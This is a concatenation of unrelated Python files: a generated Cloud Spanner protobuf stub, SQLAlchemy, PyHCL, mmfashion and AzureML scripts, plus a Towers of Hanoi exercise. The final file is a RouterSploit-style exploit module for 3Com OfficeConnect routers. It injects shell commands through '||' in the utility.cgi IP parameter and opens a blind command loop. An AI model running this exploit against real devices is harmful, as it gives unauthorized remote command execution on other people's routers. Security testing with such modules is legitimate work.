It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in
[params][google.spanner.v1.PartitionQueryRequest.params] as
JSON strings. In these cases, ``param_types`` can be used to
specify the exact SQL type for some or all of the SQL query
parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
partition_options:
Additional options that affect how many partitions are
created.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionQueryRequest)
),
)
_sym_db.RegisterMessage(PartitionQueryRequest)
_sym_db.RegisterMessage(PartitionQueryRequest.ParamTypesEntry)
PartitionReadRequest = _reflection.GeneratedProtocolMessageType(
"PartitionReadRequest",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONREADREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[PartitionRead][google.spanner.v1.Spanner.PartitionRead]
Attributes:
session:
Required. The session used to create the partitions.
transaction:
Read only snapshot transactions are supported, read/write and
single use transactions are not.
table:
Required. The name of the table in the database to be read.
index:
If non-empty, the name of an index on
[table][google.spanner.v1.PartitionReadRequest.table]. This
index is used instead of the table primary key when
interpreting
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
and sorting result rows. See
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
for further information.
columns:
The columns of
[table][google.spanner.v1.PartitionReadRequest.table] to be
returned for each row matching this request.
key_set:
Required. ``key_set`` identifies the rows to be yielded.
``key_set`` names the primary keys of the rows in
[table][google.spanner.v1.PartitionReadRequest.table] to be
yielded, unless
[index][google.spanner.v1.PartitionReadRequest.index] is
present. If
[index][google.spanner.v1.PartitionReadRequest.index] is
present, then
[key\_set][google.spanner.v1.PartitionReadRequest.key\_set]
instead names index keys in
[index][google.spanner.v1.PartitionReadRequest.index]. It is
not an error for the ``key_set`` to name rows that do not
exist in the database. Read yields nothing for nonexistent
rows.
partition_options:
Additional options that affect how many partitions are
created.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionReadRequest)
),
)
_sym_db.RegisterMessage(PartitionReadRequest)
Partition = _reflection.GeneratedProtocolMessageType(
"Partition",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITION,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Information returned for each partition returned in a
PartitionResponse.
Attributes:
partition_token:
This token can be passed to Read, StreamingRead, ExecuteSql,
or ExecuteStreamingSql requests to restrict the results to
those identified by this partition token.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.Partition)
),
)
_sym_db.RegisterMessage(Partition)
PartitionResponse = _reflection.GeneratedProtocolMessageType(
"PartitionResponse",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[PartitionQuery][google.spanner.v1.Spanner.PartitionQuery] or
[PartitionRead][google.spanner.v1.Spanner.PartitionRead]
Attributes:
partitions:
Partitions created by this request.
transaction:
Transaction created by this request.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionResponse)
),
)
_sym_db.RegisterMessage(PartitionResponse)
ReadRequest = _reflection.GeneratedProtocolMessageType(
"ReadRequest",
(_message.Message,),
dict(
DESCRIPTOR=_READREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for [Read][google.spanner.v1.Spanner.Read] and
[StreamingRead][google.spanner.v1.Spanner.StreamingRead].
Attributes:
session:
Required. The session in which the read should be performed.
transaction:
The transaction to use. If none is provided, the default is a
temporary read-only transaction with strong concurrency.
table:
Required. The name of the table in the database to be read.
index:
If non-empty, the name of an index on
[table][google.spanner.v1.ReadRequest.table]. This index is
used instead of the table primary key when interpreting
[key\_set][google.spanner.v1.ReadRequest.key\_set] and sorting
result rows. See
[key\_set][google.spanner.v1.ReadRequest.key\_set] for further
information.
columns:
Required. The columns of
[table][google.spanner.v1.ReadRequest.table] to be returned
for each row matching this request.
key_set:
Required. ``key_set`` identifies the rows to be yielded.
``key_set`` names the primary keys of the rows in
[table][google.spanner.v1.ReadRequest.table] to be yielded,
unless [index][google.spanner.v1.ReadRequest.index] is
present. If [index][google.spanner.v1.ReadRequest.index] is
present, then
[key\_set][google.spanner.v1.ReadRequest.key\_set] instead
names index keys in
[index][google.spanner.v1.ReadRequest.index]. If the [partiti
on\_token][google.spanner.v1.ReadRequest.partition\_token]
field is empty, rows are yielded in table primary key order
(if [index][google.spanner.v1.ReadRequest.index] is empty) or
index key order (if
[index][google.spanner.v1.ReadRequest.index] is non-empty). If
the [partition\_token][google.spanner.v1.ReadRequest.partition
\_token] field is not empty, rows will be yielded in an
unspecified order. It is not an error for the ``key_set`` to
name rows that do not exist in the database. Read yields
nothing for nonexistent rows.
limit:
If greater than zero, only the first ``limit`` rows are
yielded. If ``limit`` is zero, the default is no limit. A
limit cannot be specified if ``partition_token`` is set.
resume_token:
If this request is resuming a previously interrupted read,
``resume_token`` should be copied from the last
[PartialResultSet][google.spanner.v1.PartialResultSet] yielded
before the interruption. Doing this enables the new read to
resume where the last read left off. The rest of the request
parameters must exactly match the request that yielded this
token.
partition_token:
If present, results will be restricted to the specified
partition previously created using PartitionRead(). There must
be an exact match for the values of fields common to this
message and the PartitionReadRequest message used to create
this partition\_token.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ReadRequest)
),
)
_sym_db.RegisterMessage(ReadRequest)
BeginTransactionRequest = _reflection.GeneratedProtocolMessageType(
"BeginTransactionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_BEGINTRANSACTIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[BeginTransaction][google.spanner.v1.Spanner.BeginTransaction].
Attributes:
session:
Required. The session in which the transaction runs.
options:
Required. Options for the new transaction.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BeginTransactionRequest)
),
)
_sym_db.RegisterMessage(BeginTransactionRequest)
CommitRequest = _reflection.GeneratedProtocolMessageType(
"CommitRequest",
(_message.Message,),
dict(
DESCRIPTOR=_COMMITREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[Commit][google.spanner.v1.Spanner.Commit].
Attributes:
session:
Required. The session in which the transaction to be committed
is running.
transaction:
Required. The transaction in which to commit.
transaction_id:
Commit a previously-started transaction.
single_use_transaction:
Execute mutations in a temporary transaction. Note that unlike
commit of a previously-started transaction, commit with a
temporary transaction is non-idempotent. That is, if the
``CommitRequest`` is sent to Cloud Spanner more than once (for
instance, due to retries in the application, or in the
transport library), it is possible that the mutations are
executed more than once. If this is undesirable, use
[BeginTransaction][google.spanner.v1.Spanner.BeginTransaction]
and [Commit][google.spanner.v1.Spanner.Commit] instead.
mutations:
The mutations to be executed when this transaction commits.
All mutations are applied atomically, in the order they appear
in this list.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CommitRequest)
),
)
_sym_db.RegisterMessage(CommitRequest)
CommitResponse = _reflection.GeneratedProtocolMessageType(
"CommitResponse",
(_message.Message,),
dict(
DESCRIPTOR=_COMMITRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[Commit][google.spanner.v1.Spanner.Commit].
Attributes:
commit_timestamp:
The Cloud Spanner timestamp at which the transaction
committed.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CommitResponse)
),
)
_sym_db.RegisterMessage(CommitResponse)
RollbackRequest = _reflection.GeneratedProtocolMessageType(
"RollbackRequest",
(_message.Message,),
dict(
DESCRIPTOR=_ROLLBACKREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[Rollback][google.spanner.v1.Spanner.Rollback].
Attributes:
session:
Required. The session in which the transaction to roll back is
running.
transaction_id:
Required. The transaction to roll back.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.RollbackRequest)
),
)
_sym_db.RegisterMessage(RollbackRequest)
# --- protoc-generated epilogue --------------------------------------------
# Reset the cached serialized options on the file/message/field descriptors
# that carried proto-level options (e.g. required-field annotations baked in
# above). Machine-generated by protoc; do not edit by hand — regenerate from
# the .proto source instead.
DESCRIPTOR._options = None
_CREATESESSIONREQUEST.fields_by_name["database"]._options = None
_BATCHCREATESESSIONSREQUEST.fields_by_name["database"]._options = None
_BATCHCREATESESSIONSREQUEST.fields_by_name["session_count"]._options = None
_SESSION_LABELSENTRY._options = None
_SESSION._options = None
_GETSESSIONREQUEST.fields_by_name["name"]._options = None
_LISTSESSIONSREQUEST.fields_by_name["database"]._options = None
_DELETESESSIONREQUEST.fields_by_name["name"]._options = None
_EXECUTESQLREQUEST_PARAMTYPESENTRY._options = None
_EXECUTESQLREQUEST.fields_by_name["session"]._options = None
_EXECUTESQLREQUEST.fields_by_name["sql"]._options = None
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["session"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["transaction"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["statements"]._options = None
_EXECUTEBATCHDMLREQUEST.fields_by_name["seqno"]._options = None
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY._options = None
_PARTITIONQUERYREQUEST.fields_by_name["session"]._options = None
_PARTITIONQUERYREQUEST.fields_by_name["sql"]._options = None
_PARTITIONREADREQUEST.fields_by_name["session"]._options = None
_PARTITIONREADREQUEST.fields_by_name["table"]._options = None
_PARTITIONREADREQUEST.fields_by_name["key_set"]._options = None
_READREQUEST.fields_by_name["session"]._options = None
_READREQUEST.fields_by_name["table"]._options = None
_READREQUEST.fields_by_name["columns"]._options = None
_READREQUEST.fields_by_name["key_set"]._options = None
_BEGINTRANSACTIONREQUEST.fields_by_name["session"]._options = None
_BEGINTRANSACTIONREQUEST.fields_by_name["options"]._options = None
_COMMITREQUEST.fields_by_name["session"]._options = None
_ROLLBACKREQUEST.fields_by_name["session"]._options = None
_ROLLBACKREQUEST.fields_by_name["transaction_id"]._options = None
_SPANNER = _descriptor.ServiceDescriptor(
name="Spanner",
full_name="google.spanner.v1.Spanner",
file=DESCRIPTOR,
index=0,
serialized_options=_b(
"\312A\026spanner.googleapis.com\322A[https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/spanner.data"
),
serialized_start=4716,
serialized_end=7596,
methods=[
_descriptor.MethodDescriptor(
name="CreateSession",
full_name="google.spanner.v1.Spanner.CreateSession",
index=0,
containing_service=None,
input_type=_CREATESESSIONREQUEST,
output_type=_SESSION,
serialized_options=_b(
'\202\323\344\223\002?":/v1/{database=projects/*/instances/*/databases/*}/sessions:\001*\332A\010database'
),
),
_descriptor.MethodDescriptor(
name="BatchCreateSessions",
full_name="google.spanner.v1.Spanner.BatchCreateSessions",
index=1,
containing_service=None,
input_type=_BATCHCREATESESSIONSREQUEST,
output_type=_BATCHCREATESESSIONSRESPONSE,
serialized_options=_b(
'\202\323\344\223\002K"F/v1/{database=projects/*/instances/*/databases/*}/sessions:batchCreate:\001*\332A\026database,session_count'
),
),
_descriptor.MethodDescriptor(
name="GetSession",
full_name="google.spanner.v1.Spanner.GetSession",
index=2,
containing_service=None,
input_type=_GETSESSIONREQUEST,
output_type=_SESSION,
serialized_options=_b(
"\202\323\344\223\002:\0228/v1/{name=projects/*/instances/*/databases/*/sessions/*}\332A\004name"
),
),
_descriptor.MethodDescriptor(
name="ListSessions",
full_name="google.spanner.v1.Spanner.ListSessions",
index=3,
containing_service=None,
input_type=_LISTSESSIONSREQUEST,
output_type=_LISTSESSIONSRESPONSE,
serialized_options=_b(
"\202\323\344\223\002<\022:/v1/{database=projects/*/instances/*/databases/*}/sessions\332A\010database"
),
),
_descriptor.MethodDescriptor(
name="DeleteSession",
full_name="google.spanner.v1.Spanner.DeleteSession",
index=4,
containing_service=None,
input_type=_DELETESESSIONREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=_b(
"\202\323\344\223\002:*8/v1/{name=projects/*/instances/*/databases/*/sessions/*}\332A\004name"
),
),
_descriptor.MethodDescriptor(
name="ExecuteSql",
full_name="google.spanner.v1.Spanner.ExecuteSql",
index=5,
containing_service=None,
input_type=_EXECUTESQLREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET,
serialized_options=_b(
'\202\323\344\223\002K"F/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeSql:\001*'
),
),
_descriptor.MethodDescriptor(
name="ExecuteStreamingSql",
full_name="google.spanner.v1.Spanner.ExecuteStreamingSql",
index=6,
containing_service=None,
input_type=_EXECUTESQLREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._PARTIALRESULTSET,
serialized_options=_b(
'\202\323\344\223\002T"O/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeStreamingSql:\001*'
),
),
_descriptor.MethodDescriptor(
name="ExecuteBatchDml",
full_name="google.spanner.v1.Spanner.ExecuteBatchDml",
index=7,
containing_service=None,
input_type=_EXECUTEBATCHDMLREQUEST,
output_type=_EXECUTEBATCHDMLRESPONSE,
serialized_options=_b(
'\202\323\344\223\002P"K/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeBatchDml:\001*'
),
),
_descriptor.MethodDescriptor(
name="Read",
full_name="google.spanner.v1.Spanner.Read",
index=8,
containing_service=None,
input_type=_READREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET,
serialized_options=_b(
'\202\323\344\223\002E"@/v1/{session=projects/*/instances/*/databases/*/sessions/*}:read:\001*'
),
),
_descriptor.MethodDescriptor(
name="StreamingRead",
full_name="google.spanner.v1.Spanner.StreamingRead",
index=9,
containing_service=None,
input_type=_READREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._PARTIALRESULTSET,
serialized_options=_b(
'\202\323\344\223\002N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:streamingRead:\001*'
),
),
_descriptor.MethodDescriptor(
name="BeginTransaction",
full_name="google.spanner.v1.Spanner.BeginTransaction",
index=10,
containing_service=None,
input_type=_BEGINTRANSACTIONREQUEST,
output_type=google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTION,
serialized_options=_b(
'\202\323\344\223\002Q"L/v1/{session=projects/*/instances/*/databases/*/sessions/*}:beginTransaction:\001*\332A\017session,options'
),
),
_descriptor.MethodDescriptor(
name="Commit",
full_name="google.spanner.v1.Spanner.Commit",
index=11,
containing_service=None,
input_type=_COMMITREQUEST,
output_type=_COMMITRESPONSE,
serialized_options=_b(
'\202\323\344\223\002G"B/v1/{session=projects/*/instances/*/databases/*/sessions/*}:commit:\001*\332A session,transaction_id,mutations\332A(session,single_use_transaction,mutations'
),
),
_descriptor.MethodDescriptor(
name="Rollback",
full_name="google.spanner.v1.Spanner.Rollback",
index=12,
containing_service=None,
input_type=_ROLLBACKREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=_b(
'\202\323\344\223\002I"D/v1/{session=projects/*/instances/*/databases/*/sessions/*}:rollback:\001*\332A\026session,transaction_id'
),
),
_descriptor.MethodDescriptor(
name="PartitionQuery",
full_name="google.spanner.v1.Spanner.PartitionQuery",
index=13,
containing_service=None,
input_type=_PARTITIONQUERYREQUEST,
output_type=_PARTITIONRESPONSE,
serialized_options=_b(
'\202\323\344\223\002O"J/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionQuery:\001*'
),
),
_descriptor.MethodDescriptor(
name="PartitionRead",
full_name="google.spanner.v1.Spanner.PartitionRead",
index=14,
containing_service=None,
input_type=_PARTITIONREADREQUEST,
output_type=_PARTITIONRESPONSE,
serialized_options=_b(
'\202\323\344\223\002N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionRead:\001*'
),
),
],
)
# Register the generated Spanner service descriptor with the default symbol
# database and expose it on the file DESCRIPTOR (protoc-generated; do not
# edit by hand).
_sym_db.RegisterServiceDescriptor(_SPANNER)
DESCRIPTOR.services_by_name["Spanner"] = _SPANNER
# @@protoc_insertion_point(module_scope)
|
from sqlalchemy import MetaData, Table, Column, Integer, String, Text
# Registry of every column the result tables can contain, keyed by name.
# NOTE(review): these Column objects are module-level singletons; SQLAlchemy
# binds a Column to the first Table it is attached to, so reusing this dict
# for several tables in one process may fail — confirm intended usage.
_COLUMNS = {
    'id': Column('id', Integer, primary_key=True),
    'name': Column('name', String(100)),
    'algorithm': Column('algorithm', String(100)),
    'value': Column('value', Integer),
    'category': Column('category', String(100)),
    'date': Column('date', String(200)),
    'extras': Column('extras', String(200)),
    'matches': Column('matches', Text),
    'text': Column('text', Text),
    'start': Column('start', Integer),
    'end': Column('end', Integer),
}
def create_table(tablename, columns, eng):
    """Create `tablename` in database `eng` with the selected columns.

    :param tablename: name of the table to create.
    :param columns: iterable of column names to include; falsy/empty means
        "all columns defined in _COLUMNS".
    :param eng: SQLAlchemy engine (or connectable) to create the table on.

    BUGFIX: the original iterated the _COLUMNS dict directly, which yields the
    key *strings*, so Table() received column names instead of Column objects.
    We now pass the Column objects themselves.
    """
    table = Table(
        tablename,
        MetaData(),
        *(col for name, col in _COLUMNS.items()
          if not columns or name in columns))
    table.create(eng)
def format_data_as_dict(number, doc, algo_name, res):
    """Assemble one result row and return a selector over its columns.

    Builds a full row dict from the document/result pair, then returns a
    function that, given a list of column names, yields only those entries.
    """
    row = {
        'id': number,
        'name': doc.name,
        'algorithm': algo_name,
        'value': res.result,
        'category': res.value,
        'date': res.date,
        'extras': res.extras,
        # Flatten the match objects down to their source strings.
        'matches': tuple(m.matchobj.string for m in doc.matches),
        'text': res.text,
        'start': res.start,
        'end': res.end,
    }

    def data_from_columns(columns):
        """Return the subset of the row limited to `columns`."""
        return {key: value for key, value in row.items() if key in columns}

    return data_from_columns
|
from pyhcl.passes import check_form, check_types, check_widths, check_flows, infer_types, infer_widths
from pyhcl.ir.low_ir import *
class CheckAndInfer:
    """Standard check/infer pass pipeline for a PyHCL circuit."""

    @staticmethod
    def run(c: Circuit):
        """Run form checking, type/width inference, then the validation passes.

        Returns the transformed circuit produced by the last pass.
        """
        # CheckHighForm takes the circuit in its constructor; the remaining
        # passes take it as the argument to run().
        circuit = check_form.CheckHighForm(c).run()
        for compiler_pass in (infer_types.InferTypes(),
                              infer_widths.InferWidths(),
                              check_types.CheckTypes(),
                              check_flows.CheckFlow(),
                              check_widths.CheckWidths()):
            circuit = compiler_pass.run(circuit)
        return circuit
|
# For n disks, a total of 2^n - 1 moves are required.
def towersOfHanoi(n, from_stack, to_stack, aux_stack):
    """Print the moves that transfer n discs from from_stack to to_stack.

    Classic recursion: park the top n-1 discs on the auxiliary peg, move
    disc n, then bring the n-1 discs on top of it (2**n - 1 moves total).
    """
    if n != 1:
        towersOfHanoi(n - 1, from_stack, aux_stack, to_stack)
    print("Moved disc {} from {} to {}".format(n, from_stack, to_stack))
    if n != 1:
        towersOfHanoi(n - 1, aux_stack, to_stack, from_stack)
def test():
    """Demo run: print the solution for a 4-disc puzzle (15 moves)."""
    discs = 4
    towersOfHanoi(discs, 'A', 'B', 'C')


test()
# Put your name and student ID here before submitting!
# Name (ID)
import random
# uncomment one of the two lines below, depending on which library you want to use
# import tensorflow
# import torch
class NNAgent:
    """Placeholder game agent meant to be backed by a neural network."""

    def __init__(self, id):
        # Remember which player this agent controls; the network itself is
        # not built yet (see the commented-out tensorflow/torch imports).
        self.id = id

    def make_move(self, game):
        # TODO: replace with a neural-network policy.  For now just pick a
        # random free cell on the board.
        return game.board.random_free()

    def __str__(self):
        return 'Player {} (NNAgent)'.format(self.id)
|
from __future__ import division
from mmcv.parallel import MMDataParallel
from ..core import AttrPredictor, AttrCalculator, CateCalculator
from ..datasets import build_dataloader
from .env import get_root_logger
import numpy as np
import pandas as pd
def test_predictor(model,
                   dataset,
                   cfg,
                   distributed=False,
                   validate=False,
                   logger=None):
    """Test attribute prediction.

    :return top-k accuracy
    """
    if logger is None:
        logger = get_root_logger(cfg.log_level)
    # Dispatch on execution mode; the distributed path is still a stub.
    runner = _dist_test_attr if distributed else _non_dist_test_attr
    runner(model, dataset, cfg, validate=validate)
def test_cate_attr_predictor(model,
                             dataset,
                             cfg,
                             distributed=False,
                             validate=False,
                             logger=None):
    """Test joint category and attribute prediction.

    :return top-k attribute accuracy and top-k category recall rate
    """
    if logger is None:
        logger = get_root_logger(cfg.log_level)
    # Dispatch on execution mode; the distributed path is still a stub.
    runner = _dist_test_cate_attr if distributed else _non_dist_test_cate_attr
    runner(model, dataset, cfg, validate=validate)
def _non_dist_test_attr(model, dataset, cfg, validate=False):
    """Single-machine attribute-prediction test loop.

    Streams the test set through the model, accumulating per-image
    probability predictions, and periodically saves intermediate results to
    ``cfg.output_path``.
    """
    data_loader = build_dataloader(
        dataset,
        cfg.data.imgs_per_gpu,
        cfg.data.workers_per_gpu,
        len(cfg.gpus.test),
        dist=False,
        shuffle=False)
    print('dataloader built')
    model = MMDataParallel(model, device_ids=cfg.gpus.test).cuda()
    model.eval()
    attr_predictor = AttrPredictor(cfg.data.test)
    img_ids, prob_preds = None, None
    for batch_idx, testdata in enumerate(data_loader):
        if batch_idx % cfg.print_interval == 0:
            print("batch %d" % batch_idx)
        img_id = testdata["img_id"].data.cpu().numpy()
        imgs = testdata['img']
        landmark = testdata['landmark']
        attr_pred = model(imgs, attr=None, landmark=landmark, return_loss=False)
        prob_pred = attr_predictor.show_prediction(img_id, attr_pred)
        # BUGFIX: `if not img_ids:` raises "truth value of an array is
        # ambiguous" once img_ids is a multi-element numpy array; compare
        # against None explicitly.
        if img_ids is None:
            img_ids = img_id
            prob_preds = prob_pred
        else:
            img_ids = np.concatenate([img_ids, img_id], axis=0)
            prob_preds = np.concatenate([prob_preds, prob_pred], axis=0)
        if batch_idx % cfg.save_interval == 0:
            print("save intermediate prediction result")
            # BUGFIX: save_prediction lives on the AttrPredictor helper, not
            # on the raw model output (`attr_pred`).
            attr_predictor.save_prediction(img_ids, prob_preds, cfg.output_path)
    print("save final prediction result")
    attr_predictor.save_prediction(img_ids, prob_preds, cfg.output_path)
def _non_dist_test_cate_attr(model, dataset, cfg, validate=False):
    """Single-machine evaluation of joint category/attribute prediction.

    Feeds the test set through the model, accumulating top-k attribute
    accuracy and top-k category recall, then prints the final numbers.
    """
    loader = build_dataloader(
        dataset,
        cfg.data.imgs_per_gpu,
        cfg.data.workers_per_gpu,
        len(cfg.gpus.test),
        dist=False,
        shuffle=False)
    print('dataloader built')
    model = MMDataParallel(model, device_ids=cfg.gpus.test).cuda()
    model.eval()
    attr_calculator = AttrCalculator(
        cfg,
        topns=[3, 5],
        show_attr_name=True,
        attr_name_file=cfg.data.test['attr_cloth_file'])
    cate_calculator = CateCalculator(cfg, topns=[1, 3, 5])
    for batch_idx, batch in enumerate(loader):
        attr = batch['attr']
        cate = batch['cate']
        attr_pred, cate_pred = model(
            batch['img'], attr, landmark=batch['landmark'], return_loss=False)
        attr_calculator.collect_result(attr_pred, attr)
        cate_calculator.collect_result(cate_pred, cate)
        # Periodic progress report.
        if batch_idx % cfg.print_interval == 0:
            attr_calculator.show_result(batch_idx)
            cate_calculator.show_result(batch_idx)
    # Final summary over the whole test set.
    attr_calculator.show_result()
    attr_calculator.show_per_attr_result()
    cate_calculator.show_result()
def _dist_test_attr(model, dataset, cfg, validate=False):
    """Distributed attribute testing: not implemented yet (see 'to do' above)."""
    raise NotImplementedError
def _dist_test_cate_attr(model, dataset, cfg, validate=False):
    """Distributed category/attribute testing: not implemented yet."""
    raise NotImplementedError
|
"""Full training script"""
import logging
from azureml.core import Dataset#, ScriptRunConfig, Environment
from azureml.core.compute import ComputeTarget
from azureml.core.experiment import Experiment
from azureml.automl.core.forecasting_parameters import ForecastingParameters
from azureml.train.automl import AutoMLConfig
from azureml.train.automl.run import AutoMLRun
import pandas as pd
from authentication import ws
logging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')
def pd_dataframe_register(
        df=None,
        def_blob_store=None,
        name=None,
        desc=None):
    """Register a pandas dataframe as an AzureML tabular dataset.

    :param df: pandas dataframe to register.
    :param def_blob_store: datastore target for the uploaded data.
    :param name: dataset name to register under.
    :param desc: optional dataset description.
    :return: the registered dataset with 'date' set as its timestamp column.

    BUGFIX: with_timestamp_columns() returns a *new* dataset; the original
    assigned it to a local and returned nothing, so the timestamp-aware
    dataset was silently discarded.  Return it so callers can use it.
    """
    full_dataset = Dataset.Tabular.register_pandas_dataframe(
        dataframe=df,
        target=def_blob_store,
        name=name,
        description=desc
    )
    return full_dataset.with_timestamp_columns('date')
def create_register_datasets(source=None, full_dataset_name=None,
                             training_set_name=None,
                             test_set_name=None):
    """Register the full dataset plus a train/test split.

    Reads the CSV at `source` and registers three datasets: the whole frame,
    everything but the last 10 rows (training), and the last 10 rows (test).
    """
    frame = pd.read_csv(source)
    blob_store = ws.get_default_datastore()
    # Register full first, then the chronological train/test split.
    for data, ds_name in ((frame, full_dataset_name),
                          (frame[:-10], training_set_name),
                          (frame[-10:], test_set_name)):
        pd_dataframe_register(df=data, def_blob_store=blob_store, name=ds_name)
def model_train(dataset=None, compute_target=None, experiment_name=None):
    """Train a forecasting model on `dataset` with AutoML.

    Submits an AutoML forecasting experiment, blocks until completion and
    returns the run wrapped as an AutoMLRun.
    """
    forecast_params = ForecastingParameters(
        time_column_name='date',
        forecast_horizon=12,
        # The next three settings are forecasting-specific; drop them to fall
        # back to a simple regression setup.
        target_rolling_window_size=3,
        feature_lags='auto',
        target_lags=12,
        freq='D',
        validate_parameters=True)
    # AutoML configuration.  Disabled knobs kept for reference:
    # allowed_models=['AutoArima', 'Prophet'], blocked_models=['XGBoostClassifier'],
    # verbosity=logging.INFO, training_data=dataset.as_named_input('retrain_dataset')
    automl_config = AutoMLConfig(
        task='forecasting',
        primary_metric='normalized_root_mean_squared_error',
        iteration_timeout_minutes=30,
        experiment_timeout_hours=1.0,
        compute_target=compute_target,
        max_concurrent_iterations=4,
        featurization="off",
        training_data=dataset,
        label_column_name='close',
        n_cross_validations=3,
        enable_voting_ensemble=True,
        enable_early_stopping=False,
        model_explainability=True,
        enable_dnn=True,
        forecasting_parameters=forecast_params)
    experiment = Experiment(ws, experiment_name)
    submitted = experiment.submit(automl_config, show_output=True, wait_post_processing=True)
    submitted.wait_for_completion()
    logging.info(f'Run details: {submitted}')
    # Re-wrap so AutoML-specific helpers (e.g. get_best_child) are available.
    return AutoMLRun(experiment, run_id=submitted.id)
def register_best_model(
        remote_run=None,
        model_name=None,
        model_path=None,
        description=None):
    """Register the best child model of an AutoML run.

    :param remote_run: completed AutoMLRun to pick the best child from.
    :param model_name: name to register the model under.
    :param model_path: path of the model artifact inside the run outputs.
    :param description: human-readable model description.
    :return: the registered model object.
    """
    best_child = remote_run.get_best_child()
    registered = best_child.register_model(
        model_name=model_name,
        model_path=model_path,
        description=description,
    )
    logging.info(f"Registered {model_name}, with {description}")
    return registered
def main():
    """Main operational flow: register datasets, train, register best model."""
    ticker = 'FB'
    full_name = f'Full dataset for {ticker}'
    train_name = f'Training set for {ticker}'
    test_name = f'Test set for {ticker}'
    cluster = ComputeTarget(workspace=ws, name='cpu-cluster')
    # Upload/register the raw data and its train/test split.
    create_register_datasets(
        source='./datasets/stock_data.csv',
        full_dataset_name=full_name,
        training_set_name=train_name,
        test_set_name=test_name)
    # Train on the registered training set.
    training_ds = Dataset.get_by_name(workspace=ws, name=train_name)
    run = model_train(
        dataset=training_ds,
        compute_target=cluster,
        experiment_name='stock_price_timeseries')
    # Persist the winning model.
    register_best_model(
        remote_run=run,
        model_name='stock_price_model',
        model_path='outputs/model.pkl',
        description='Stock price model')
# Script entry point: run the pipeline only when executed directly.
if __name__ == "__main__":
    main()
|
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """RouterSploit-style module for the 3Com OfficeConnect blind RCE.

    Exploits an unauthenticated command injection in ``utility.cgi``
    (exploit-db 9862).  Command output is not returned, so the injection
    is blind.
    """
    __info__ = {
        "name": "3Com OfficeConnect RCE",
        "description": "Module exploits 3Com OfficeConnect remote command execution "
                       "vulnerability which allows executing command on operating system level.",
        "authors": (
            "Andrea Fabizi",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/9862/",
        ),
        "devices": (
            "3Com OfficeConnect",
        ),
    }
    # Module options exposed to the framework user.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        """Heuristically test for the vulnerability, then open a command loop."""
        # The vulnerable endpoint should answer 200 on affected devices.
        response1 = self.http_request(
            method="GET",
            path="/utility.cgi?testType=1&IP=aaa",
        )
        if response1 and response1.status_code == 200:
            # Fetch a random, non-existent CGI path; if its content differs
            # from the real endpoint's, the endpoint is considered genuine.
            path = "/{}.cgi".format(utils.random_text(32))
            response2 = self.http_request(
                method="GET",
                path=path,
            )
            if not response2 or response1.text != response2.text:
                print_success("Target appears to be vulnerable")
                print_status("Invoking command loop...")
                print_status("It is blind command injection - response is not available")
                shell(self, architecture="mipsbe")
            else:
                print_error("Exploit failed - target does not seem to be vulnerable")
        else:
            print_error("Exploit failed - target does not seem to be vulnerable")

    def execute(self, cmd):
        """Inject `cmd` via '||' in the IP parameter; output is never returned."""
        path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd)
        self.http_request(
            method="GET",
            path=path,
        )
        return ""

    @mute
    def check(self):
        """No reliable vulnerability check exists for this device."""
